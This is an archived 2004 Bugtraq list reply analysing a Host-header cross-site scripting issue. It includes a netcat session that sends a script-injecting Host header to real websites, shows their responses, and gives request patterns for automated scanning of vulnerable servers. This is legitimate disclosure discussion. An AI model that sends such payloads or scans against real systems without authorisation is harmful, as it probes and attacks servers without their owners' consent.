Re: MAGIC XSS INTO THE DNS: coelacanth

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: MAGIC XSS INTO THE DNS: coelacanth
From: <qazxdrgb@xxxxxxxxxxx>
Date: 17 Jun 2004 20:49:37 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

In-Reply-To: <200406151517.i5FFH8pC029012@xxxxxxxxxxxxxxxxxxxxxxxxx>

This just plain simple XSS attacks, and additionally it relies on a (long 
since?) patched vulnerability in IIS.

>Still unclear how or why this can be interpreted into the site 
>or through the browser.

What is unclear?
1. they allow (whatever).(domainanme) hostnames into  site. That is not very 
uncommon.
2. they generate absolute paths by concatenating "http://"+hostname+"/URI";
3. webserver does not abort with HTTP/1.1 400 Bad Request as it should.


This is not that uncommon, looking for this we will most likely find it in a 
lot of CGI/PHP/JSP/ASP code. Luckily, the attack requires the host to accept 
silly hostnames. The problem with e-gold.com is that they use an old webserver 
with an already fixed IIS vulnerability I think;

bash-2.02$ cat test.txt
GET /hello/just/a/test/please/forgive/me HTTP/1.1
Host: ">&lt;script&gt;alert()&lt;/script&gt;


bash-2.02$ nc www.microsoft.com 80 < test.txt
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 17 Jun 2004 20:15:07 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>bash-2.02$ nc www.e-gold.com 80  < test.txt
HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/4.0
Date: Thu, 17 Jun 2004 20:15:56 GMT
Connection: close
Content-Length: 930
Content-Type: text/html
<cut junk>

To extend the attack to more systems, one need to find dangerous meta 
characters which are not filtered by normal Bad Request / Bad Address filters.

I did a very hasty search for webservers which would output unformated 
hostnames or URI's in error messages, without any luck. But I am certain 
someone more tenacious will succeed. The net is vast.

Basically, searches for potential vulnerable sites can be automated by testing 
the pattern such as:

GET / HTTP/1.1
Host: XXXXXXXXXXXXXXXXX

GET /some_script HTTP/1.1
Host: XXXXXXXXXXXXXXXXX

GET /GIVE-ME-NOT-FOUND HTTP/1.1
Host: XXXXXXXXXXXXXXXXX

GET GIVE-ME-BAD-URI HTTP/1.1
Host: XXXXXXXXXXXXXXXXX

Do we get XXXXXXXXXXXXXXXXX back in HTML?

Would be pretty easy to add the most basic searches to vulnerability scanners I 
think.

Sincerly yours,
Peter, 11a nu

Prev by Date: RE: Is predictable spam filtering a vulnerability?
Next by Date: RE: Caveat Lector: Beastie Boys Evil
Previous by thread: MAGIC XSS INTO THE DNS: coelacanth
Next by thread: ActiveX control download and redirection
Index(es):
- Date
- Thread